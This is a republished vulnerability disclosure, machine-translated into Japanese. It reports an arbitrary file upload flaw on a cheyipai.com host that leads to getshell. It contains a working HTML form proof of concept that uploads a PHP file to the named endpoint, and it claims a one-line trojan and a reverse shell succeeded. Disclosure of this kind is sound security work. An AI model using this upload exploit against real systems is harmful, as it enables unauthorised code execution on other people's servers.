Getshell_html/css_WEB-ITnose

WBOY
WBOYオリジナル
2016-06-21 08:51:571249ブラウズ

漏洞标题 车易拍某站Getshell
相关厂商 cheyipai.com
漏洞作者 荒废的腰子
提交时间 2016-03-28 11:03
公开时间 2016-04-02 11:10
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 15
漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞
Tags标签 getshell, 任意文件上传

脆弱性の詳細

ファイルをアップロードできる場所があります

http://imo.cheyipai.com/file/ NDisk/write .php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>

1 文のトロイの木馬をアップロード

4501ea6664ea7ceaec075dea5fb2b686

シェルのリバウンドに成功しました

脆弱性の証拠:

ファイルをアップロードできる場所があります

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>

一文をアップロードするトロイの木馬

c2ac8f76f64bf9a713711aa6f6fff46c

シェルのリバウンドに成功しました

修復計画:

アップグレード

著作権表示: 転載元を示してください: Wasted Kidney @ Wuyun

[この記事の著作権はSafe Pulseに属しており、許可なく複製することはできません。この記事は著者の意見を表明しているだけです。異なる意見がある場合は、SecPulse WeChat ID: SecPulse を追加して連絡してください。 】

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。